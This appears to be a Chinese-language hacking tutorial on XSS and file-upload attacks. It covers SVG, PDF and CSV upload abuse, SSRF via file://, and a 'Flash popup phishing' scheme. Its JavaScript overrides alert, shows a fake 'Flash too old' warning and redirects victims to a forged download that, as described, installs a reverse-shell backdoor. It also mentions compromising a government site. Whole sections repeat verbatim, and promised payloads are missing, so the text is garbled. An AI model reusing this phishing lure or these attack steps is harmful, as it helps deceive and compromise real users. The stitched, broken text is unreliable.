今天,咱们要深入探讨的是 XSS 之 Flash 弹窗钓鱼和文件上传 getshell 的各种门道。对 于一些刚接触这个领域的朋友,咱们先简单介绍下 XSS 漏洞和文件上传漏洞。之后会进行 XSS 之 Flash 弹窗钓鱼的演示,再整理一下 pdf 木马制作的过程,最后还会分享一个成功 拿下人社局小程序站点并实现 getshell 的案例。
对于 html 造成 XSS 攻击,大家应该都比较熟悉了,这里就不多说了。重点来说说 svg 文 件是如何引发 xss 攻击的。检查思路如下:
•然后将这个文件上传到目标位置,并进行访问。如果一切顺利,你会看到成功弹出的窗 口,这就说明存在 xss 风险。
另外,如果目标网站存在导出功能,比如将 svg 导出为 pdf 的功能,那么可能存在 SSRF 风险。此时,你可以尝试使用其他协议,如file://,来更直观地查看情况。
(二)PDF 文件上传隐患
允许上传 PDF 文件时,可能会出现 PDF XSS 和任意 URL 跳转的问题。不过,由于这属于 浏览器层面的漏洞,厂商大概率不会认可。你可以直接使用工具生成相关文件,比 如https://www.xunjiepdf.com/editor。当然,按 照网上的操作,使用迅捷 PDF 编辑器也能达到相同的效果。
因为 pdf 通常是后端的组件,有些开发人员可能会将其配置 成wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf,这样就可以直接利用file协议 进行攻击。如果网站本身存在预览 JS 的地方,还可以尝试通过 CVE - 2024 - 4367 来实 现 PDF XSS,进而获取 Cookie、接管账户等。
(三)CSV 文件上传危机
如果网站允许上传 CSV 文件,并且上传的 CSV 文件内容没有经过处理过滤就直接保存,那 么就存在很大的安全风险。你可以尝试上传具有恶意命令执行 payload 的 CSV 文件,当其 他用户下载该文件时,就可能会导致命令执行。
CSV 文件的 Payload 如下:
检查思路很简单:先上传恶意的 CSV 文件,然后下载该文件,观察下载后的 CSV 文件是否 对等号=等特殊符号做了处理,以及 payloads 是否能够成功执行。如果可以,那就说明 存在问题。
(一)文件上传原理剖析
文件上传操作看似简单,实则暗藏玄机。它主要利用 form 表单标签和类型为 file 的 Input 标签来完成。不过,这里有个关键步骤,就是要将表单数据编码格式设置 为multipart/form-data类型。这种编码类型就像是一个“智能翻译官”,会在文件上传时 对文件内容进行处理,让服务端处理程序能够准确解析文件的类型和内容,从而顺利完成上 传操作。
(二)XSS 原理深度解读
XSS,也就是跨站脚本攻击,是网络侦查中常见的漏洞之一。攻击者常常会在网页中偷偷插 入恶意的JavaScript代码。由于服务器在对输入数据进行过滤和验证时不够严格,这些恶 意代码就会“混进”响应内容中返回给客户端。当浏览器解析服务器的响应时,就会“乖乖”执 行这些恶意代码,攻击者也就可以趁机实施各种恶意操作了。
(一)HTML 或 SVG 上传风险
允许上传 html 或 svg 文件,可能会带来一系列的安全隐患。它不仅可能导致 xss 攻击, 还能引发任意 URL 跳转,甚至在某些情况下可能导致 SSRF(不过这种情况很难利用),因 为核心的 js 代码是可控的。
对于 html 造成 XSS 攻击,大家应该都比较熟悉了,这里就不多说了。重点来说说 svg 文 件是如何引发 xss 攻击的。检查思路如下:
•然后将这个文件上传到目标位置,并进行访问。如果一切顺利,你会看到成功弹出的窗 口,这就说明存在 xss 风险。
另外,如果目标网站存在导出功能,比如将 svg 导出为 pdf 的功能,那么可能存在 SSRF 风险。此时,你可以尝试使用其他协议,如file://,来更直观地查看情况。
(二)PDF 文件上传隐患
允许上传 PDF 文件时,可能会出现 PDF XSS 和任意 URL 跳转的问题。不过,由于这属于 浏览器层面的漏洞,厂商大概率不会认可。你可以直接使用工具生成相关文件,比 如https://www.xunjiepdf.com/editor。当然,按 照网上的操作,使用迅捷 PDF 编辑器也能达到相同的效果。
因为 pdf 通常是后端的组件,有些开发人员可能会将其配置 成wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf,这样就可以直接利用file协议 进行攻击。如果网站本身存在预览 JS 的地方,还可以尝试通过 CVE - 2024 - 4367 来实 现 PDF XSS,进而获取 Cookie、接管账户等。
(三)CSV 文件上传危机
如果网站允许上传 CSV 文件,并且上传的 CSV 文件内容没有经过处理过滤就直接保存,那 么就存在很大的安全风险。你可以尝试上传具有恶意命令执行 payload 的 CSV 文件,当其 他用户下载该文件时,就可能会导致命令执行。
CSV 文件的 Payload 如下:
检查思路很简单:先上传恶意的 CSV 文件,然后下载该文件,观察下载后的 CSV 文件是否 对等号=等特殊符号做了处理,以及 payloads 是否能够成功执行。如果可以,那就说明 存在问题。
(一)基础环境搭建
要进行 XSS 之 Flash 弹窗钓鱼,首先得准备好基础环境。
(二)钓鱼流程详解
2.跳转伪造界面:当目标用户点击弹窗中的确定按钮后,就会跳转到伪造 flash 界面 的 VPS 服务器。3.触发后门反弹:目标靶机点击下载并安装后,就会触发后门反弹 shell。
(三)代码修改要点
在version.js中,要修改弹窗的指向伪造 Flash 网站地址。具体代码如下:
12345678910window.alert =function(name){var iframe = document.createElement("IFRAME"); iframe.style.display ="none"; iframe.setAttribute("src","data:text/plain,"); document.documentElement.appendChild(iframe); window.frames[0].window.alert(name); iframe.parentNode.removeChild(iframe);};alert("您的 FLASH 版本过低,尝试升级后访问该页面! ");window.location.href ="此处是伪造 Flash 网站地址";
模拟存在 XSS 网站的 VPS 服务器文件index.html ,内容为Flash Test... (具体内 容因未给出,暂不详细描述)。
总之,网络侦查领域充满了挑战和机遇。通过深入了解 XSS 钓鱼和文件上传漏洞,我们可 以更好地保护自己的网络安全,同时也能在这个领域中不断探索和进步。希望今天的分享能 对大家有所帮助,让我们一起在网络侦查的道路上越走越远!